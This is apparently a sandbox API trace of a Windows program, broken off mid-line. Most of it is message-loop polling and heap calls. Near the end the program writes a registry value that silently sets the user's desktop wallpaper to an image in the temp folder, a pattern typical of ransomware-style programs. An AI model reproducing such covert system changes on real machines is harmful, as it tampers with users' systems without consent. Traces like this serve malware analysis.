[0309.224] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.224] Sleep (dwMilliseconds=0xa) [0309.239] timeGetTime () returned 0x4d373 [0309.239] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.239] Sleep (dwMilliseconds=0xa) [0309.255] timeGetTime () returned 0x4d383 [0309.255] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.255] Sleep (dwMilliseconds=0xa) [0309.271] timeGetTime () returned 0x4d392 [0309.271] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.271] Sleep (dwMilliseconds=0xa) [0309.286] timeGetTime () returned 0x4d3a2 [0309.286] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.286] Sleep (dwMilliseconds=0xa) [0309.302] timeGetTime () returned 0x4d3b1 [0309.302] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.302] Sleep (dwMilliseconds=0xa) [0309.317] timeGetTime () returned 0x4d3c1 [0309.317] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.317] Sleep (dwMilliseconds=0xa) [0309.335] timeGetTime () returned 0x4d3d1 [0309.335] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.335] Sleep (dwMilliseconds=0xa) [0309.348] timeGetTime () returned 0x4d3e0 [0309.348] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.349] Sleep (dwMilliseconds=0xa) [0309.364] timeGetTime () returned 0x4d3f0 [0309.364] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.364] Sleep (dwMilliseconds=0xa) [0309.380] timeGetTime () returned 0x4d3ff [0309.380] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.380] Sleep (dwMilliseconds=0xa) [0309.395] timeGetTime () returned 0x4d40f [0309.395] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.395] Sleep (dwMilliseconds=0xa) [0309.411] timeGetTime () returned 0x4d41f [0309.411] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.411] Sleep (dwMilliseconds=0xa) [0309.426] timeGetTime () returned 0x4d42e [0309.426] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.426] Sleep (dwMilliseconds=0xa) [0309.444] timeGetTime () returned 0x4d43e [0309.444] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.444] Sleep (dwMilliseconds=0xa) [0309.458] timeGetTime () returned 0x4d44d [0309.458] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.458] Sleep (dwMilliseconds=0xa) [0309.473] timeGetTime () returned 0x4d45d [0309.473] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.473] Sleep (dwMilliseconds=0xa) [0309.489] timeGetTime () returned 0x4d46d [0309.489] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.489] Sleep (dwMilliseconds=0xa) [0309.504] timeGetTime () returned 0x4d47c [0309.504] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.505] Sleep (dwMilliseconds=0xa) [0309.522] timeGetTime () returned 0x4d48c [0309.522] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.522] Sleep (dwMilliseconds=0xa) [0309.536] timeGetTime () returned 0x4d49b [0309.536] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.536] Sleep (dwMilliseconds=0xa) [0309.551] timeGetTime () returned 0x4d4ab [0309.551] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.551] Sleep (dwMilliseconds=0xa) [0309.567] timeGetTime () returned 0x4d4bb [0309.567] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.567] Sleep (dwMilliseconds=0xa) [0309.582] timeGetTime () returned 0x4d4ca [0309.582] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.582] Sleep (dwMilliseconds=0xa) [0309.607] timeGetTime () returned 0x4d4da [0309.607] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.607] Sleep (dwMilliseconds=0xa) [0309.614] timeGetTime () returned 0x4d4e9 [0309.614] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.614] Sleep (dwMilliseconds=0xa) [0309.629] timeGetTime () returned 0x4d4f9 [0309.629] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.629] Sleep (dwMilliseconds=0xa) [0309.645] timeGetTime () returned 0x4d509 [0309.645] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.645] Sleep (dwMilliseconds=0xa) [0309.660] timeGetTime () returned 0x4d518 [0309.660] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.660] Sleep (dwMilliseconds=0xa) [0309.676] timeGetTime () returned 0x4d528 [0309.676] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.676] Sleep (dwMilliseconds=0xa) [0309.692] timeGetTime () returned 0x4d537 [0309.692] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.692] Sleep (dwMilliseconds=0xa) [0309.707] timeGetTime () returned 0x4d547 [0309.707] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.707] Sleep (dwMilliseconds=0xa) [0309.724] timeGetTime () returned 0x4d557 [0309.724] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.725] Sleep (dwMilliseconds=0xa) [0309.738] timeGetTime () returned 0x4d566 [0309.738] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.738] Sleep (dwMilliseconds=0xa) [0309.754] timeGetTime () returned 0x4d576 [0309.754] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.754] Sleep (dwMilliseconds=0xa) [0309.770] timeGetTime () returned 0x4d585 [0309.770] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.770] Sleep (dwMilliseconds=0xa) [0309.785] timeGetTime () returned 0x4d595 [0309.785] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.785] Sleep (dwMilliseconds=0xa) [0309.801] timeGetTime () returned 0x4d5a5 [0309.801] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.801] Sleep (dwMilliseconds=0xa) [0309.817] timeGetTime () returned 0x4d5b4 [0309.817] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.817] Sleep (dwMilliseconds=0xa) [0309.832] timeGetTime () returned 0x4d5c4 [0309.832] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.832] Sleep (dwMilliseconds=0xa) [0309.848] timeGetTime () returned 0x4d5d3 [0309.848] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.848] Sleep (dwMilliseconds=0xa) [0309.863] timeGetTime () returned 0x4d5e3 [0309.863] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0309.863] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0309.863] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0309.864] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0309.864] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0309.864] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.864] Sleep (dwMilliseconds=0xa) [0309.879] timeGetTime () returned 0x4d5f3 [0309.879] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.879] Sleep (dwMilliseconds=0xa) [0309.894] timeGetTime () returned 0x4d602 [0309.894] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.894] Sleep (dwMilliseconds=0xa) [0309.911] timeGetTime () returned 0x4d612 [0309.911] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.911] Sleep (dwMilliseconds=0xa) [0309.926] timeGetTime () returned 0x4d621 [0309.926] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0309.926] Sleep (dwMilliseconds=0xa) [0309.941] timeGetTime () returned 0x4d631 [0309.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0309.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0309.945] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0309.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0309.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0309.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0309.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0309.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0309.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0309.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0309.945] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0309.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0309.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0309.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0309.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0309.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0309.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0309.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0309.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0309.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0309.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0309.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0309.946] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0309.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0309.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0309.946] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0309.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0309.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0309.946] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0309.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0309.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0309.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0309.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0309.947] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0309.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0309.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0309.947] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0309.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0309.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0309.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0309.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0309.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0309.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0309.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0309.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0309.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0309.947] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0309.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0309.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0309.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0309.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0309.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0309.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0309.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0309.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0309.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0309.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0309.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0309.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0309.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0309.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0309.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0309.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0309.948] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0309.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0309.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0309.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0309.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0309.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0309.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0309.949] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0309.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0309.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0309.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0309.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0309.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0309.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0309.949] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0309.949] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0309.950] RegCloseKey (hKey=0x294) returned 0x0 [0309.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0309.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0309.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0309.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0309.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0309.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0309.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0309.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0309.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0309.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0309.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0309.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0309.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0309.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0309.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0309.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0309.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0309.950] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0309.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0309.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0309.951] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0309.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0309.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0309.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0309.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dd8 [0309.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0309.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0309.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0309.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0309.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0309.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0309.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0309.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0309.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0309.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0309.951] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0309.951] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0309.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0309.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0309.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0309.952] HeapFree (in: 